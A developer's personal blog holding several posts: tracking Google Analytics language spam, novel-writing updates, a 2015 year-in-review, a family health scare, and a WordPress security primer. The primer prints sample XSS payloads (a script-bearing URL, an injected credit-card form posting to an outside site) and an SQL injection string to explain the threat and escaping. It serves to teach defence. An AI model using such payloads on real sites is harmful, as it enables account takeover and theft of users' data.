Where Trump Language Spam Is Coming From

A few days ago, I noticed a tweet from Amy Oztan:

I decided to look at my Google Analytics to see if I was being hit with this. When I loaded the stats for my new GhostThiefNovel.com website, I saw a big spike in traffic. My first thought was “hooray! My efforts to get the word out about my novel are paying off.” Sadly, though, my traffic hadn’t spiked all that much. Instead, my Ghost Thief site was being hit with the very Language Spam that Amy Oztan was talking about.

Needless to say, this upset me a bit. And when I’m upset, I tend to do what I always fall back on…

Collecting data.

(What? Everyone doesn’t collect data when they’re upset?)

I checked some other sites I manage and sure enough many of those were hit with the language spam just like my Ghost Thief site was. Thankfully, I was able to create a Google Analytics filter to weed out the spam. It won’t block the spammers from hitting your site (something that I’m actually working on), but it will let you see your actual traffic minus the “Vote Trump” language spam. Fortunately, Google lets you share out custom built filters (they call them segments), so click here to add it to your Google Analytics.

Next, I started to wonder where all this language spam was coming from. Was this spread out all over or was it localized in one region? I went through all of the sites whose Google Analytics I have access to and put together a spreadsheet. The results were obvious right from the start. There was a large array of countries that the spam was coming from including France, Japan, Hungary, and even the United States. By far, though, Russia accounted for the most language spam traffic. Russia’s share was 98.4% of the traffic. The closest countries – the United States and Ukraine – were tied at 0.19% each.

Put in a graph:

[Graph: language spam origins by country]

What’s the takeaway from this? Well, Russian hackers have been in the news a lot, so it’s tempting to bring them up and try to link these two topics. I don’t think they are linked – except in the sense of Internet “bad guys” coming from Russia. Also, it’s tempting to just say “Block all traffic from Russia,” but valid traffic can come from there as well. If your target audience is localized enough, blocking a whole country might work, but this definitely isn’t the right solution for most people. Instead, for now, use the Google Analytics filter to get your real traffic numbers and stay tuned as I work on my “anti-language spam” Google plugin.
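The filtering and per-country tally described in this post can be reproduced on an exported report. This is an added example, not the author's Google Analytics segment; it assumes spam rows carry free text in the Language dimension, and the row layout, sample values and function names are constructed for illustration.

```javascript
// Added example (not the author's segment): split exported Google Analytics
// rows into real traffic and "language spam", then rank the spam by country.
// Assumption: spam puts free text in the Language dimension, while real
// browsers report a short tag such as "en-us" or "fr".

// Constructed sample rows, not real measurements.
const SAMPLE_ROWS = [
  { language: "en-us", country: "United States", sessions: 40 },
  { language: "en-gb", country: "United Kingdom", sessions: 12 },
  { language: "fr", country: "France", sessions: 5 },
  { language: "(not set)", country: "Canada", sessions: 3 },
  { language: "example.invalid Vote Trump", country: "Russia", sessions: 90 },
  { language: "example.invalid Vote Trump", country: "United States", sessions: 6 },
  { language: "example.invalid Vote Trump", country: "Ukraine", sessions: 4 },
];

// Shape of a plausible language tag: 2-3 letters plus optional subtags.
const LANGUAGE_TAG = /^[a-z]{2,3}(?:[-_][a-z0-9]{2,8})*$/i;

// True when the Language value does not look like a language tag.
// Empty and "(not set)" values are treated as missing data, not spam.
function isLanguageSpam(language) {
  const value = String(language).trim();
  if (value === "" || value === "(not set)") return false;
  return !LANGUAGE_TAG.test(value);
}

// Returns session totals for real and spam traffic, plus the spam sessions
// per country with each country's percentage share, largest first.
function summarizeLanguageSpam(rows) {
  let realSessions = 0;
  let spamSessions = 0;
  const byCountry = new Map();
  for (const row of rows) {
    if (isLanguageSpam(row.language)) {
      spamSessions += row.sessions;
      byCountry.set(row.country, (byCountry.get(row.country) || 0) + row.sessions);
    } else {
      realSessions += row.sessions;
    }
  }
  const spamByCountry = [...byCountry.entries()]
    .map(([country, sessions]) => ({
      country,
      sessions,
      sharePct: spamSessions === 0 ? 0 : Math.round((sessions / spamSessions) * 10000) / 100,
    }))
    .sort((a, b) => b.sessions - a.sessions || a.country.localeCompare(b.country));
  return { realSessions, spamSessions, spamByCountry };
}

console.log(summarizeLanguageSpam(SAMPLE_ROWS));
```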

 

Oh, and check out my book’s website. It’d be nice for the numbers to spike because of real traffic and not because of some spammers.

Novel Creativity

I feel like I’ve been ignoring this blog.

*Checks last post date*

Yes, yes I have.

I swear that this wasn’t intentional. As you might know from my posts and many tweets about it, I’ve been writing a novel. Now, I know that I have a bad habit of not completing personal projects because I had another good idea. I didn’t want this to happen with my novel. I didn’t want a great blog post idea to derail me from the excellent novel writing progress that I was making. So I focused all my creative energy on the novel.

The novel is done now. Or, at least, as done as it’s going to be for now. I’ve entered a very nerve wracking phase called “Giving The Novel To Beta Readers.” During this phase, I give copies of my text to people to read over. They will tell me if there’s a plot hole I’m missing, if the characters seem realistic enough, or if there’s a problem with the story flow.

Once I got over the nervousness of “wait, I need to let other people read this?” I was confronted by the torturer that is the waiting game. At this point, my beta readers have begun their task but haven’t had time to finish. Do they like it so far? Are they shaking their head with every word? I want to know but don’t want to pester them with twice daily e-mails asking for their opinion.

In a couple weeks, I’ll get the reports in and will likely need to make some changes to improve my story. Then it’s time to format my book for printing and get a sample copy to make sure everything looks good. Finally, my book will appear on Amazon. If everything goes well, it’ll be available in early October. (I’ll definitely post when I get a firm release date – also, if anyone is interested in doing a review, feel free to contact me.)

In the meantime, though, I can use this “novel downtime” to catch up with some blog posts I’ve wanted to do.

Thanks to all of my readers who were patient with me while my creative energies weren’t blog bound.

Saying Goodbye To 2015

[Image: Goodbye 2015]

This past year has been an eventful one.  For better or for worse, it is coming to an end.  Our New Year’s Eve tradition is to have a "Junk Food Dinner" (mostly hors d’oeuvres) and stay up until the ball drops.  My tradition on this blog is to look back at some of my favorite posts of the year.

January

Unfortunately, I rang in the New Year with a resurgence of my post-surgery anxiety attacks.  I realized that Anxiety Is A Bully.  It tries to dictate the rules of engagement to you so that they vastly favor the anxiety and not you.  It’s important to fight back, realize what anxiety is doing, and refuse to play by its rules.

On a more serious front, the Charlie Hebdo attack led me to wonder about the Freedom To Offend and the Freedom To Be Offended.  While it might seem tempting to silence people from saying offensive things, we’ve got to protect their right to offend.  If we don’t, then someone else might take offense to something we think is important and silence us.  At the same time, people have a right to be offended and to call for there to be consequences.  If a politician says something extremely offensive to me, then it’s my right to protest and demand he be removed from office.  This doesn’t mean silencing him.  It just means balancing two different, yet related rights.  It can be tricky to navigate these waters without going too far in either direction, but it’s important that we don’t let ourselves sway too far against the offensive or against those who are offended.

Did you know I have a Zazzle store?  I didn’t.  I posted a parody of "Soft Kitty" from Big Bang Theory and then inspiration struck and I turned it into a T-Shirt.  I’m not sure if any have actually sold, but I love coming up with things like this.

February

I began February with an Extreme Geekery.  I looked into the Archimedes quote "Give me a lever long enough and I shall move the world."  Spoiler alert:  This would work, but the lever’s going to be really, really, REALLY long!  (I also had fun adding drawings to my post.  I don’t do that enough.)

With a measles epidemic raging, I dove into the subject of vaccines and consequences.  My takeaway: Vaccines work.  Those who claim they cause autism or contain toxins or are worse than the diseases they prevent are ignorant at best or trying to sell you bunk at worst.  Unless you have a medical condition that precludes vaccination (e.g. some allergies or an immune system disorder), everyone should be vaccinated.  It’s a simple procedure that will save the lives of not just the vaccinated but of the people who can’t be due to age or medical issues.

We spent much of last year playing Minecraft.  I’ll admit that I haven’t picked it up much recently, but there have been many updates that my boys have shown me and I might just need to try them out myself.

March

March began with a monumental event.  We cancelled cable.  Without cable, we joined the ever growing ranks of cord cutters and got our video entertainment from a mixture of Internet-based video services (Netflix, Amazon Prime, Hulu), renting DVDs from our local library, and an OTA antenna.  I also have some new equipment that I need to set up which will let me record shows and stream videos to our TV.  We’ve been saving money every month and haven’t looked back.

We had a touching moment in a local museum.  They had an electronic drum set and NHL – who plays percussion in his band – was rocking out to it.  A set of headphones he wore kept the sound to himself.  A little girl came up to watch him play and NHL offered her his headphones.  The little girl was instantly mesmerized by the sounds NHL was producing.  Her eyes glazed over as her full attention was given to what her ears were hearing.  Then NHL gave her the drumsticks and helped show her how to make the sounds.  He willingly gave up a spot at one of his favorite exhibits so that a little girl he didn’t know could discover the wonders of drumming.  It’s a little gesture, but I was so proud of him at that moment.

April

During April, we got into some tabletop gaming with Pandemic.  We were introduced to it by a family member during Passover and had to get it ourselves.  What I love about Pandemic is that everyone works together.  There is no one winner or loser.  Either everyone wins by curing the diseases or everyone loses as the diseases ravage the world.

There was also a big WordPress vulnerability found and as people rushed to update I explained just what the vulnerability meant and how web developers usually tackle this sort of thing.

May

May was a very geeky month.  Along with Free Comic Book Day and palindrome week, Star Wars Day meant we could play some lightsaber games.  May also saw JSL turning 8.  To wrap up the geekery, California instituting "toilet to tap" led me to wonder just how much water was in the world to drink.  It turns out that it’s a lot, but it isn’t an infinite resource.

I also wrote about Asperger’s Syndrome and how it affects neurotypical siblings.  JSL can be very patient with his brother at times, but he does have his limits and will often crave non-NHL times.

June

In June, I took some lessons from a rose bush – don’t listen to others telling you that you can’t succeed, just do your best and keep at it.

I also wreaked havoc with society by inventing instant transportation.  Ok, I just wrote about what would happen to society if someone invented it.  Given how I think it would turn out, be thankful it’s not here.

Unfortunately, we had a crazy week when B’s mother had a heart attack and ended up in the hospital.  She’s feeling better now, but it was scary (especially for the boys who were right there when it happened).  To add insult to injury, it happened on her birthday which also happened to be the day she retired.  Everyone should know the real life symptoms of heart attacks.  (That last link isn’t one of my blog posts, but it’s important enough to bring up as often as possible.)

Thanks to then-newly-running candidate Donald Trump, I explored the true cost of web development.  Unfortunately for Trump, you can’t develop a large, complex web application that will be used nation-wide and only pay $3.  It simply cannot be done.

July

In July, New Horizons’ impending rendezvous with Pluto made me geek out about how quickly we’d be able to travel around the Earth if we could move at the speeds New Horizons was travelling at.

A tweet from The Bloggess inspired me to gather a series of 18 things that I’d tell 18 year old me.

Finally, it’s amazing how much you can get attached to a piece of furniture.  We finally got rid of our old couch.  It was hard to do, but it also was time.  The boys got to sit on it one last time as it lay on the curb awaiting pickup.  I even let them jump on it – something we never let them do when it was in our living room.

August

In August, I turned 40 years old.  Or, as I like to think of it, the 11th anniversary of my 29th birthday.  In addition, NHL turned 12.  Why won’t he stop growing up?  Why?!!!

We also began a cruising adventure to celebrate my 40th birthday.

September

In September, I shared a washy washy, happy happy, smiley smiley cruise greeting and described our incredible beach day at Norwegian’s private island.

This was also the month of me speed reading.  NHL was reading the Percy Jackson series so I decided to read them as well.  (I’ve always been a fan of Greek mythology.)  I not only tore through the first book, but the entire series (passing where NHL was).  Since then, I’ve finished Rick Riordan’s Heroes of Olympus series, his Kane trilogy, and the first book in his Asgard series.  I’ve only stopped because I’ve run out of books by him.  (Come on, Rick, get book 2 written quickly!)  I’ve also read The Bloggess’ Furiously Happy and laughed the whole way through.

October

In October, I wrote a rebuttal to someone who claimed that kids with Autism are better off when they’re bullied.  The author actually used the word "perks" to describe the results of bullying.  I’d use words like tormenting, paranoia, isolation, loneliness, and hopelessness instead to describe what happens when someone is bullied.  If you want to call those "perks" then you have a really warped definition of the word perks.

On the video gaming front, I fulfilled a lifelong desire to make Mario video games thanks to Super Mario Maker.

After picking 44.5 pounds of apples, I baked apple dishes until we were sick of apples.

Finally, I wrote up a guide to help people who wanted to explore cutting cable.

November

In November, I went through some scary Halloween decorations and an even scarier Christmas one.

I also gave a peek at what goes on in my head when I try to communicate verbally.  It’s a battle on many fronts and not one I win every time.

December

December saw our Star Wars excitement build to critical mass.  Spoiler free review:  The Force Awakens was incredible.  I can’t wait to see it again.

We also celebrated B’s birthday and I had a mini-mid life crisis thanks to my Imposter Syndrome.

Finally, we had some fun with Google Cardboard.

 

It’s been a wonderful year.  Here’s hoping that 2016 will be exciting in all the right ways.

NOTE: The "Goodbye 2015" image above is based on "Fireworks Remix" by keriann3 which is available from OpenClipArt.org.

It’s Been A Crazy Week – And Not In A Good Way

[Image: Heart ECG Logo]

It’s been a crazy few weeks and, unfortunately, not in a good way.

Three weeks ago, I suddenly got a bad neck and back muscle spasm.  It hurt to move, turn my head, sit down, or get up.  I’ve gotten these before.  They usually  appear in stressful situations and disappear in a day or so.  Unfortunately, for whatever reason, the pain continued for an entire week.  Just when I would think it was gone, the pain would return and pain medication only helped a little.  The pain would even spread down my arms. One night, the pain across my body kept me up so late that it triggered a late night panic attack.  Still, as difficult as this was, it was nothing compared to the next event that turned our lives upside down.

Friday June 12th was my mother-in-law’s birthday.  It was also the day when she was retiring.  Needless to say, we went out with B’s parents for a celebratory dinner.  We ordered our food and began talking, but B’s mother kept rubbing her upper chest area – just under her neck.  She explained that her chest hurt bad.  We were worried, but she assured us that she was fine.  B began looking up some symptoms on Google while mom also noted that she felt sweaty.  She thought it was indigestion and took some medication for that, but the pain just got worse.  NHL, sitting next to her, was getting worried (as were the rest of us) and kept rubbing her back and asking if she was alright.

By the time the food came, she was pale and looked like she was going to pass out on her plate.  We finally decided that she needed to go to the hospital.  She tried to argue but we countered that we’d call 911 if she didn’t go immediately.  Besides, we would rather she go to the hospital and have it turn out to be nothing than not go and have it turn out to be something!  My father-in-law exited the booth, followed by NHL, and my mother-in-law slowly exited.  (NHL kept trying to hurry her up so she could quickly get the help that she obviously needed.)  My wife saw them out to their car while I sat at the table with the boys.

With their food served and their grandparents gone, the boys dug in.  B came back but (for obvious reasons) didn’t feel like eating.  I was worried but had the opposite reaction.  When I’m worried, I stress eat.  Even more, I wasn’t sure if we would need to run out of the restaurant so I gobbled my food down quickly.  (Given that I eat quickly to begin with, that’s saying something.)  We got B’s food and her parents’ food wrapped up to go, paid the bill, and hurried to the car.  B went to see her mother in the ER while I took the kids home to get them ready for bed.  That night, B didn’t get in until well after midnight.

The next morning, B went back to the hospital.  By this point, we knew what was going on.  My mother-in-law had had a heart attack.  It was a mild one, but a mild heart attack is still a heart attack.  We knew that she would be in the hospital for quite a few days as they observed her and ran tests.  Those next days went by like a blur.  B’s brother came into town to visit his mother.  I kept the boys busy while B stayed by her mother’s side.  The boys and I even visited mom in the hospital a few times.  (Since they saw her looking so weak and sick during her heart attack, we knew it would be important for them to see her feeling better even if it was in a hospital bed.)

Finally, after some confirmation that her heart was alright, she was released on Tuesday.  Of course, she’s still going to need to take it easy for a bit, but she’s already doing better.

There are a couple of lessons here.  First of all, Dr. Google can often get a bad rap.  Yes, looking up random symptoms can lead you to hypochondria or make you think you have some disease that you don’t have.  However, it can also help you discover the symptoms of something serious when you would otherwise just write it off as nothing important.  Secondly, heart attack symptoms in men differ from those in women.  The classic "movie heart attack" is a guy clutching his chest, perhaps complaining of pain in his left arm, and then collapsing on the floor.  The real life symptoms of a heart attack can include heartburn/indigestion, sweating, arm pain in either arm, toothache, and even general malaise.  Knowing the real symptoms and getting help quickly can be the difference between life and death.  Finally, never be too proud to seek help or write off your suffering as not important enough to get medical attention.  Time can be a big determining factor in the outcome of heart attacks and many other medical issues.  The quicker you get medical help, the better.

Once B’s mother was on the mend, you’d think that our lives could return to normal, but B developed a sinus infection and then an ear infection.  The pain and the antibiotics took their toll on her.  She’s still in pain and having trouble hearing out of one ear, but hopefully she is getting better.

After a month of medical issues, I’m ready for a nice, quiet, boring stretch.  Stay safe, everyone.

NOTE: The "Heart ECG Logo" above is by juliobahar and is available from OpenClipArt.org.

Why You Need To Upgrade WordPress Now (and Back It Up While You’re At It)

Last week, there was a big announcement in the WordPress world about a security vulnerability existing within many plugins.  Plugin authors scrambled to fix the issues quickly while the call went out for everyone to update their plugins and WordPress installations.  As a web developer, I understood what the vulnerability was all about, why it could be so dangerous, and what an attacker could use it to do.  As I thought about it, though, I realized that non-web developers might need a quick primer on just what the problem was.

The Problem

WordPress can be a wonderful tool for developers.  Not only is it a Content Management System, but it has a series of functions available to programmers to use in the course of writing code.  You don’t have to re-invent the wheel because WordPress has built-in functions that can be used to complete the job.  A long time ago, there might have been security concerns with WordPress’s functions.  Thankfully, though, the WordPress team has put a lot of effort into security.  Unfortunately, the documentation for a couple of the functions was vague.  Developers thought that two of the functions were sanitizing the user’s input when they weren’t.

Clean That Input

What does sanitizing input mean?  It means that a developer should never trust what a user enters into a system.  If a user is prompted to enter a number between 1 and 10, it shouldn’t be assumed that they didn’t type 11.  Or abc.  Or ‘ and 1=1; Delete From Users.  If the wrong user input is blindly accepted, the program might give bad results, crash, or – even worse – allow a malicious user to run commands that could compromise the security of the server, its data, and subsequent users.  Luckily, before user input is used, it can be checked and potentially harmful contents can be neutralized.  In the case of the WordPress vulnerability, the lack of cleaning up user input meant that a Cross-Site Scripting (XSS) attack could be formed.

What is XSS?

Cross-Site Scripting (or XSS) happens when malicious user input is placed on a website and is used to run scripts on a user’s computer.  Suppose a blog had a comment page that had an XSS vulnerability.  An attacker could craft a link in the form of

http://www.someblog.com/comment.php?Username=<script>document.cookie = "expires: Wed, 1 Apr 2015 12:00:00 UTC; path=/";</script>

This particular link would erase the person’s cookies – effectively logging the person out of the website.  Annoying, but ultimately harmless.  However, a more advanced form of this attack might read information stored in the cookie variables (e.g. usernames, passwords) and send them to the attacker (perhaps by using JavaScript to load an image with the data to send in the image’s link).  If the attacker sent this more advanced link to a user, he could take control of that user’s account.

Now, imagine a comment form.  The basic comment form is quite simple.  Just take the user’s comment and display it on the website.  Not hard, right?  If I input:

Very nice article.  I agree wholeheartedly.

then that should appear on the page.  What, however, should happen if I write:

Very nice article.  I agree wholeheartedly.  <form action="http://www.somewebsite.com/">Credit Card Number: <input type="text" name="CCNumber" /><input type="submit" /></form>

Should that appear on the page as is?  In case you don’t “speak HTML”, that comment – if left unfiltered – would make a form appear on the page asking for a user’s credit card number. This phony form won’t fool anyone, of course, but a more advanced version of this could wipe out all elements on a page and display a real looking login page – with the usernames/passwords being sent to the attacker (and logging the users in if the attacker wanted to be extra sneaky).  The form could also ask for a user’s personal information or payment information – compromising the user’s credit card number or other details.

In all of these cases, the attacker uses not only the XSS vulnerability, but the trustworthiness of the website being used to fool users.  If your users usually pay for access to your website, they might not think anything is wrong when your website suddenly reports that it needs to confirm the users’ credit card numbers.

How Do I Stop XSS?

Stopping Cross-Site Scripting attacks is actually very simple.  I even had to resort to it while writing this article.  My blog post editor kept wanting to turn some of the HTML tags into actual HTML.  To keep it from doing this, I replaced all “<” angle brackets with &lt; (the HTML code for “<”) and all “>” angle brackets with &gt; (the HTML code for “>”).  Doing this to user input should make the attacker’s HTML code show instead of being interpreted and run.  Of course, to do this, you need to know how to work with the code behind websites.
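The "number between 1 and 10" check from "Clean That Input" and the escaping step described above, side by side with the unescaped version, as an added example (not code from WordPress or any plugin, and written in JavaScript rather than WordPress's PHP). All function names are hypothetical and the inputs are constructed from the article's own samples; it goes one step beyond replacing “<” and “>” by also encoding &, " and ', which matters when input lands inside an HTML attribute.

```javascript
// Added example: validate input against what is expected, and HTML-encode
// untrusted text before it is written into a page. Names are hypothetical.

const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can change HTML structure, in a single pass.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// The replacement described in the article: angle brackets only.
function escapeAngleBracketsOnly(untrusted) {
  return String(untrusted).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Allow-list check for "a number between 1 and 10": anything that is not
// exactly one of those ten strings is rejected (null), never repaired.
function parseRating(raw) {
  if (typeof raw !== "string" || !/^(?:[1-9]|10)$/.test(raw)) return null;
  return Number(raw);
}

// Vulnerable: user text is concatenated into the markup unchanged.
function renderCommentUnsafe(username, comment) {
  return `<div class="comment"><b>${username}</b>: ${comment}</div>`;
}

// Hardened: the same template, with every user value encoded on output.
function renderCommentSafe(username, comment) {
  return `<div class="comment"><b>${escapeHtml(username)}</b>: ${escapeHtml(comment)}</div>`;
}

// Attribute context: the value sits between double quotes, so an unencoded
// quote ends the attribute even though no angle bracket is present.
function renderNameField(username, escaper) {
  return `<input type="text" name="Username" value="${escaper(username)}">`;
}

// Constructed inputs based on the article's examples.
const FORM_COMMENT =
  'Very nice article. <form action="http://www.somewebsite.com/">' +
  'Credit Card Number: <input type="text" name="CCNumber" /></form>';
const ATTRIBUTE_INPUT = 'x" data-injected="1';

console.log(renderCommentUnsafe("visitor", FORM_COMMENT)); // form would render
console.log(renderCommentSafe("visitor", FORM_COMMENT));   // form shows as text
console.log(renderNameField(ATTRIBUTE_INPUT, escapeAngleBracketsOnly));
console.log(renderNameField(ATTRIBUTE_INPUT, escapeHtml));
console.log(["7", "11", "abc", "' and 1=1; Delete From Users"].map(parseRating));
```

In WordPress code, the built-in output helpers esc_html() and esc_attr() play the role of escapeHtml here.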

But What About WordPress Plugins?

When you use WordPress plugins, you need to have some level of trust as to the quality of the code.  Few users have the time (or the skill) to pore over all of the code in all of their plugins to spot all of the vulnerabilities.  The best most users can hope for is that the developers (or users with the time and skill) find the bugs and fix them.  These fixes will be posted as updated versions.  This is why it is essential to keep WordPress, its plugins, and its themes up to date.  It doesn’t matter if the vulnerability in Really Cool Plugin was fixed in version 1.3 if you’re still running version 1.2.  And don’t think you can hide behind people not knowing what version you are running.  Hackers can use automated tools to scan many sites for many different vulnerabilities – only giving their attention to the openings that they want to exploit.

How do you update?

To update your WordPress installation, log into your WordPress installation’s admin panel (usually http://www.yoursite.com/wp-admin/).  Under Dashboard on the left hand side is a menu option called “Updates.”  Clicking this leads you to a page where you can update the WordPress core installation, plugins, and themes.  (In the case of the latter, bad coding can lead to security holes within themes which might be patched with a new version of the theme.)

What about plugins with no updates?

Not every plugin author updates his plugins in a timely fashion.  Whether because he is busy on other projects or because the plugin you are using isn’t being actively developed anymore, you might still find yourself running vulnerable plugins.  Worse still, you might not know it until the plugin is exploited.  There are security plugins that can be used to mitigate the risk, but in the end one of the best defenses is a good backup.  Make sure that you have backups of your website files as well as your database.  With luck, you’ll never need them, but if you do you will be glad that you had them.

Techydad Backup & Update Service.

There are many WordPress plugins that one can use to back up one’s WordPress sites.  If anyone needs any assistance, I’d like to extend an offer, though.  I’ll back up your website and database once a week as well as run monthly updates on your site for a monthly fee.  If you are interested, contact me and we can discuss pricing.

Stay safe online and happy blogging, everyone!
